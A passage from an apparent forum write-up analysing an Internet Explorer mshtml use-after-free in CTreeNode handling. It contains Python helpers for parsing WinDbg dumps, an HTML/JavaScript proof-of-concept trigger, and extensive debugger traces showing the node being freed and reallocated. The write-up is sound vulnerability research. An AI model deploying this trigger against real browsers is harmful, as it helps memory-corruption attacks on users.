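Element: +0x00 vftable, +0x18 tag byte. Anything beyond this is assumed.
"""
import re

# vftable -> class, copied from the `ln` output in the trace
SYMBOLS = {
    0x6A0F70E0: "CPhraseElement",
    0x6A11C2E8: "CGenericElement",
    0x6A246670: "CBodyElement",
}

# `dd` lines pasted from the trace: sup node, its element, body node,
# body element, audio node, audio element
DD_DUMPS = """
127c7fb0  1af02fd8 15171fb0 ffff0060 ffffffff
127c7ff0  00000008 00000000 00000000 d0d0d0d0
127c8000  ???????? ???????? ???????? ????????
1af02fd8  6a0f70e0 00000002 00000008 00000000
1af02fe8  071faee0 00000000 80000060 00010000
15171fb0  150e3fd0 1379cfb0 00046210 00090004
15171ff0  00000008 00000000 00000000 d0d0d0d0
150e3fd0  6a246670 00000005 00000008 07701fe8
150e3fe0  071fae80 15171fb0 00000010 8202e280
196e2fb0  07824fc8 15171fb0 ffff0075 ffffffff
196e2ff0  00000008 00000000 00000000 d0d0d0d0
07824fc8  6a11c2e8 00000002 00000008 1506efe8
07824fd8  071faeb0 00000000 80000075 00010000
"""


def parse_dd(text):
    """Turn `dd` output into {dword_address: value}; '????????' (unmapped) is skipped."""
    mem = {}
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        base = int(parts[0], 16)
        for i, tok in enumerate(parts[1:]):
            if re.fullmatch(r"[0-9a-fA-F]{8}", tok):
                mem[base + 4 * i] = int(tok, 16)
    return mem


def mapped(mem, addr):
    return (addr & ~3) in mem


def read_dword(mem, addr):
    return mem[addr]


def read_byte(mem, addr):
    # little-endian: byte n of the aligned dword is bits 8n..8n+7
    return (mem[addr & ~3] >> (8 * (addr & 3))) & 0xFF


def read_word(mem, addr):
    return (mem[addr & ~3] >> (8 * (addr & 3))) & 0xFFFF


def decode_treenode(mem, node):
    """Fields of a CTreeNode, using only the offsets the constructor writes."""
    return {
        "element": read_dword(mem, node),
        "parent": read_dword(mem, node + 4),
        "tag": read_byte(mem, node + 8),
        "flags": read_byte(mem, node + 9),
        "words": tuple(read_word(mem, node + o) for o in (0x0A, 0x0C, 0x0E)),
        "flags40": read_dword(mem, node + 0x40),
    }


def decode_element(mem, elem):
    """vftable -> class name, plus the tag byte the node constructor copies."""
    vft = read_dword(mem, elem)
    return {"vftable": vft, "class": SYMBOLS.get(vft, "unknown@%08x" % vft),
            "tag": read_byte(mem, elem + 0x18)}


def walk_to_root(mem, node):
    """Follow node+4 upward, naming each node's element, until the parent
    pointer is null or leaves the dumped memory (the body's parent is not dumped)."""
    chain = []
    while mapped(mem, node) and mapped(mem, node + 4):
        elem = read_dword(mem, node)
        cls = decode_element(mem, elem)["class"] if mapped(mem, elem) else "unmapped"
        chain.append((node, cls))
        node = read_dword(mem, node + 4)
        if node == 0:
            break
    return chain


def tag_consistent(mem, node):
    """Check the invariant the trace shows: node+8 equals element+0x18."""
    n = decode_treenode(mem, node)
    return n["tag"] == decode_element(mem, n["element"])["tag"]


if __name__ == "__main__":
    mem = parse_dd(DD_DUMPS)
    for node in (0x127C7FB0, 0x196E2FB0):
        print(["%08x %s" % (a, c) for a, c in walk_to_root(mem, node)],
              "tag ok" if tag_consistent(mem, node) else "tag MISMATCH")
```

Feeding it the page's dumps reproduces the manual result: the sup node chains to a CPhraseElement then the CBodyElement node, the audio node to a CGenericElement then the same body node, and in both cases node+8 matches element+0x18. Pasting a `dd` of the freed node from the crash would let the same walk show which pointer now dangles.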

<html>
<script>
function trigger()
{
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
document.body.appendChild(id_0);
document.body.appendChild(id_1);

Math.tan(3,4);            // marker: a breakpoint on jscript!tan stops here
id_1.applyElement(id_0);
Math.cos(3,4);            // marker: jscript!cos
id_0.onlosecapture=function(e) {
document.write("");
}
Math.sin(3,4);            // marker: jscript!sin
id_0['outerText']="";
Math.tan(3,4);            // marker: jscript!tan
id_0.setCapture();
Math.cos(3,4);            // marker: jscript!cos
id_1.setCapture();
Math.sin(3,4);            // marker: jscript!sin
}
window.onload = function() {
trigger();
}
</script>
</html>

The POC is modified with auxiliary debugging statements (the Math.* calls), and breakpoints are set on them.

1:021> g
Breakpoint 0 hit
eax=00000000 ebx=0441e988 ecx=00000005 edx=00000003 esi=0441e978 edi=0441e978
eip=6c77d8c0 esp=0441e874 ebp=0441e8b0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!tan:
6c77d8c0 ff258010756c    jmp     dword ptr [jscript!_imp__tan (6c751080)] ds:0023:6c751080={msvcrt!tan (773dde34)}

Set the breakpoints again:

1:021> bl
 0 e 6c77d8c0     0001 (0001)  1:**** jscript!tan
 1 e 6a2bced0     0001 (0001)  1:**** mshtml!CTreeNode::CTreeNode
 2 e 6a2fe563     0001 (0001)  1:**** mshtml!CTreeNode::Release
 3 e 6a23480f     0001 (0001)  1:**** mshtml!CElement::CElement
 4 e 6a31071b     0001 (0001)  1:**** mshtml!CElement::~CElement
 5 e 6a45673b     0001 (0001)  1:**** mshtml!CElement::applyElement
1:021> g
Breakpoint 5 hit
eax=06eaafd8 ebx=6a628c2c ecx=6a45673b edx=0441e814 esi=00001200 edi=00000000
eip=6a45673b esp=0441e7ec ebp=0441e820 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::applyElement:
6a45673b 8bff            mov     edi,edi

As expected it breaks here, so mshtml!CElement::applyElement is the function behind the JavaScript applyElement.

1:021> g
Breakpoint 5 hit
eax=06eaafd8 ebx=6a628c2c ecx=6a45673b edx=0441e814 esi=00001200 edi=00000000
eip=6a45673b esp=0441e7ec ebp=0441e820 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::applyElement:
6a45673b 8bff            mov     edi,edi
1:021> dd esp
0441e7ec  6a462da7 06e4efc8 07394fd8 052d5ff4
0441e7fc  0441e878 00810fd0 6a462cbe 6a2b2820
0441e80c  052d5ff4 07394fd8 00000002 00000000
0441e81c  00080009 0441e894 6a32235c 06e4efc8
0441e82c  00810fd0 06eaafd8 0000016c 6a2b2820
0441e83c  00000001 05498fe8 0441e870 00810fd0
0441e84c  00000000 80070005 01001002 77890023
0441e85c  0441ea68 0000016c 06eaafd8 00000000
1:021> dd 06e4efc8
06e4efc8  6a11c2e8 00000004 00000008 0738cfe8
06e4efd8  062c5ef0 07337fb0 00000075 00010200
06e4efe8  00000000 075c2f30 06e96ff4 00000000
06e4eff8  00000000 00000000 ???????? ????????
06e4f008  ???????? ???????? ???????? ????????
06e4f018  ???????? ???????? ???????? ????????
06e4f028  ???????? ???????? ???????? ????????
06e4f038  ???????? ???????? ???????? ????????
1:021> ln 6a11c2e8 
(6a11c2e8)   mshtml!CGenericElement::`vftable'   |  (6a254ce0)   mshtml!CHeaderElement::`vftable'
Exact matches:
    mshtml!CGenericElement::`vftable' = <no type information>
1:021> dd 07394fd8
07394fd8  6a627f68 00000001 6a2d2fa8 06e42fd8
07394fe8  6a2aaadc 00000000 00000000 00020000
07394ff8  03000048 00000000 ???????? ????????
07395008  ???????? ???????? ???????? ????????
07395018  ???????? ???????? ???????? ????????
07395028  ???????? ???????? ???????? ????????
07395038  ???????? ???????? ???????? ????????
07395048  ???????? ???????? ???????? ????????
1:021> ln 6a627f68 
(6a627f68)   mshtml!s_apfnTrackerTearoffVtable   |  (6a6280a0)   mshtml!s_fontFamilyMap
Exact matches:
    mshtml!s_apfnTrackerTearoffVtable = <no type information>

The first argument is a pointer to the CGenericElement object; we established earlier that id_1 is the CGenericElement.

1:021> r
eax=06eaafd8 ebx=6a628c2c ecx=6a45673b edx=0441e814 esi=00001200 edi=00000000
eip=6a45673b esp=0441e7ec ebp=0441e820 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::applyElement:
6a45673b 8bff            mov     edi,edi
1:021> g
Breakpoint 2 hit
eax=00000003 ebx=075c2f30 ecx=063f0754 edx=07392fb0 esi=07392fb0 edi=00000000
eip=6a2fe563 esp=0441e684 ebp=0441e738 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::Release:
6a2fe563 8b4a40          mov     ecx,dword ptr [edx+40h] ds:0023:07392ff0=00000008
1:021> dd edx
07392fb0  06e42fd8 00000000 ffff0060 ffffffff
07392fc0  00000051 00000000 00000000 00000000
07392fd0  00000000 00000000 00000052 00000000
07392fe0  00000000 00000000 00000000 00000000
07392ff0  00000008 00000000 00000000 d0d0d0d0
07393000  ???????? ???????? ???????? ????????
07393010  ???????? ???????? ???????? ????????
07393020  ???????? ???????? ???????? ????????
1:021> dd 06e42fd8
06e42fd8  6a0f70e0 00000002 00000008 00000000
06e42fe8  062c5f20 07392fb0 80000060 80010200
06e42ff8  00000002 075c2f30 ???????? ????????
06e43008  ???????? ???????? ???????? ????????
06e43018  ???????? ???????? ???????? ????????
06e43028  ???????? ???????? ???????? ????????
06e43038  ???????? ???????? ???????? ????????
06e43048  ???????? ???????? ???????? ????????
1:021> ln 6a0f70e0
(6a0f70e0)   mshtml!CPhraseElement::`vftable'   |  (6a0f7308)   mshtml!CBlockElement::`vftable'
Exact matches:
    mshtml!CPhraseElement::`vftable' = <no type information>

Note that Math.cos(3,4); has not been hit yet, which shows that id_1.applyElement(id_0); caused the CTreeNode of the CPhraseElement (id_0) to be released.

1:021> 
eax=06ab8fb0 ebx=00000000 ecx=06ab8fb0 edx=00000008 esi=00000008 edi=06e42fd8
eip=6a2bcf61 esp=0441e664 ebp=0441e668 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x91:
6a2bcf61 5e              pop     esi
1:021> dd eax
06ab8fb0  06e42fd8 077a2fb0 ffff0060 ffffffff
06ab8fc0  00000000 00000000 00000000 00000000
06ab8fd0  00000000 00000000 00000000 00000000
06ab8fe0  00000000 00000000 00000000 00000000
06ab8ff0  00000008 00000000 00000000 d0d0d0d0
06ab9000  ???????? ???????? ???????? ????????
06ab9010  ???????? ???????? ???????? ????????
06ab9020  ???????? ???????? ???????? ????????
1:021> dd 06e42fd8 
06e42fd8  6a0f70e0 00000002 00000008 00000000
06e42fe8  062c5f20 00000000 80000060 80010000
06e42ff8  00000002 06ebefe8 ???????? ????????
06e43008  ???????? ???????? ???????? ????????
06e43018  ???????? ???????? ???????? ????????
06e43028  ???????? ???????? ???????? ????????
06e43038  ???????? ???????? ???????? ????????
06e43048  ???????? ???????? ???????? ????????
1:021> ln 6a0f70e0 
(6a0f70e0)   mshtml!CPhraseElement::`vftable'   |  (6a0f7308)   mshtml!CBlockElement::`vftable'
Exact matches:
    mshtml!CPhraseElement::`vftable' = <no type information>

Then this object is immediately allocated again.

1:021> g
Breakpoint 6 hit
eax=00000000 ebx=0441e988 ecx=00000005 edx=00000003 esi=0441e978 edi=0441e978
eip=6c77d67f esp=0441e874 ebp=0441e8b0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!cos:
6c77d67f ff259010756c    jmp     dword ptr [jscript!_imp__cos (6c751090)] ds:0023:6c751090={msvcrt!cos (773d8ace)}

It breaks on the auxiliary statement.

1:021> g
Breakpoint 2 hit
eax=06eaafd8 ebx=06e42fd8 ecx=063f06ec edx=06ab8fb0 esi=06ab8fb0 edi=06eaafd8
eip=6a2fe563 esp=0441e440 ebp=0441e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::Release:
6a2fe563 8b4a40          mov     ecx,dword ptr [edx+40h] ds:0023:06ab8ff0=00000012
1:021> dd edx
06ab8fb0  06e42fd8 077a2fb0 00020260 00030001
06ab8fc0  00000061 00000000 07337fd8 07382fe0
06ab8fd0  07382fe0 07337fc0 00000062 00000000
06ab8fe0  07390fe0 07337fd8 07337fd8 07390fe0
06ab8ff0  00000012 00000000 00000000 d0d0d0d0
06ab9000  ???????? ???????? ???????? ????????
06ab9010  ???????? ???????? ???????? ????????
06ab9020  ???????? ???????? ???????? ????????
1:021> dd 06e42fd8
06e42fd8  6a0f70e0 00000006 00000020 06aaafe8
06e42fe8  062c5f21 06ab8fb0 00000060 82010200
06e42ff8  00000002 075c2f30 ???????? ????????
06e43008  ???????? ???????? ???????? ????????
06e43018  ???????? ???????? ???????? ????????
06e43028  ???????? ???????? ???????? ????????
06e43038  ???????? ???????? ???????? ????????
06e43048  ???????? ???????? ???????? ????????
1:021> ln 6a0f70e0
(6a0f70e0)   mshtml!CPhraseElement::`vftable'   |  (6a0f7308)   mshtml!CBlockElement::`vftable'
Exact matches:
    mshtml!CPhraseElement::`vftable' = <no type information>

We can see that the CTreeNode of the CPhraseElement has been released again; this is caused by

id_0.onlosecapture=function(e) {
document.write("");
}

being executed.

1:021> g
Breakpoint 7 hit
eax=00000000 ebx=0441e988 ecx=00000005 edx=00000003 esi=0441e978 edi=0441e978
eip=6c77d711 esp=0441e874 ebp=0441e8b0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!sin:
6c77d711 ff256810756c    jmp     dword ptr [jscript!_imp__sin (6c751068)] ds:0023:6c751068={msvcrt!sin (773d8aea)}


1:021> g
Breakpoint 2 hit
eax=0736cfa8 ebx=00000000 ecx=00000720 edx=07337fb0 esi=07337fb0 edi=06e4efc8
eip=6a2fe563 esp=0441e48c ebp=0441e5e0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::Release:
6a2fe563 8b4a40          mov     ecx,dword ptr [edx+40h] ds:0023:07337ff0=00000008
1:021> dd edx
07337fb0  06e4efc8 00000000 ffff0075 ffffffff
07337fc0  00000051 00000000 00000000 00000000
07337fd0  00000000 07337fd8 00000152 00000001
07337fe0  00000000 00000000 07337fc0 06ab8fd8
07337ff0  00000008 00000000 00000000 d0d0d0d0
07338000  ???????? ???????? ???????? ????????
07338010  ???????? ???????? ???????? ????????
07338020  ???????? ???????? ???????? ????????
1:021> dd 06e4efc8 
06e4efc8  6a11c2e8 00000002 00000008 0738cfe8
06e4efd8  062c5ef0 07337fb0 80000075 88010200
06e4efe8  00000002 075c2f30 06e96ff4 00000000
06e4eff8  00000000 00000000 ???????? ????????
06e4f008  ???????? ???????? ???????? ????????
06e4f018  ???????? ???????? ???????? ????????
06e4f028  ???????? ???????? ???????? ????????
06e4f038  ???????? ???????? ???????? ????????
1:021> ln 6a11c2e8 
(6a11c2e8)   mshtml!CGenericElement::`vftable'   |  (6a254ce0)   mshtml!CHeaderElement::`vftable'
Exact matches:
    mshtml!CGenericElement::`vftable' = <no type information>
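
The Math.tan/cos/sin marker technique used throughout this trace can be automated: the following added example (my own code, not from the original post) parses WinDbg breakpoint output and attributes every CTreeNode construction or release to the POC statement that was executing at the time. The log excerpt is constructed to mirror the trace above, and it is assumed that `this` is in ecx at the constructor entry (thiscall) while the trace shows it in edx at Release.

```python
import re
# Constructed WinDbg-style excerpt modelled on the trace above (not the page's raw
# output): each hit is "Breakpoint N hit", a register line, then the symbol line.
SAMPLE_LOG = """\
Breakpoint 0 hit
eax=00000000 ebx=0441e988 ecx=00000005 edx=00000003 esi=0441e978 edi=0441e978
jscript!tan:
Breakpoint 2 hit
eax=00000003 ebx=075c2f30 ecx=063f0754 edx=07392fb0 esi=07392fb0 edi=00000000
mshtml!CTreeNode::Release:
Breakpoint 1 hit
eax=00000000 ebx=00000000 ecx=06ab8fb0 edx=00000008 esi=00000008 edi=06e42fd8
mshtml!CTreeNode::CTreeNode:
Breakpoint 6 hit
eax=00000000 ebx=0441e988 ecx=00000005 edx=00000003 esi=0441e978 edi=0441e978
jscript!cos:
Breakpoint 2 hit
eax=06eaafd8 ebx=06e42fd8 ecx=063f06ec edx=06ab8fb0 esi=06ab8fb0 edi=06eaafd8
mshtml!CTreeNode::Release:
"""
# POC statements in the order the jscript!tan/cos/sin marker breakpoints fence them.
STATEMENTS = ["id_1.applyElement(id_0)", "id_0.onlosecapture = ...",
              "id_0['outerText'] = \"\"", "id_0.setCapture()", "id_1.setCapture()"]
MARKERS = {"jscript!tan", "jscript!cos", "jscript!sin"}
# Register holding the CTreeNode `this` at each breakpoint: assumed ecx at the
# constructor entry (thiscall); the trace above shows it in edx at Release.
THIS_REG = {"mshtml!CTreeNode::CTreeNode": "ecx", "mshtml!CTreeNode::Release": "edx"}
REG_RE = re.compile(r"\b([a-z]{3})=([0-9a-f]{8})\b")

def attribute_events(log, statements=STATEMENTS):
    """Return (statement, event, node) for each CTreeNode ctor/Release hit."""
    events, regs, window = [], {}, -1
    for line in log.splitlines():
        sym = line.rstrip(":")
        if REG_RE.search(line):          # register dump line: remember values
            regs.update(REG_RE.findall(line))
        elif sym in MARKERS:             # Math.* marker: next POC statement begins
            window += 1
        elif sym in THIS_REG and 0 <= window < len(statements):
            kind = "ctor" if sym.endswith("::CTreeNode") else "release"
            events.append((statements[window], kind, regs[THIS_REG[sym]]))
    return events

def lifetime_by_node(events):
    """Group events per node address: each node's create/release history by statement."""
    history = {}
    for stmt, kind, node in events:
        history.setdefault(node, []).append((stmt, kind))
    return history
```

Running it on the constructed excerpt yields the same conclusion reached by hand above: node 06ab8fb0 is created during applyElement and released again while the onlosecapture statement runs.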

Statement: the views in this article are the author's own; when reposting, please indicate that it comes from 看雪.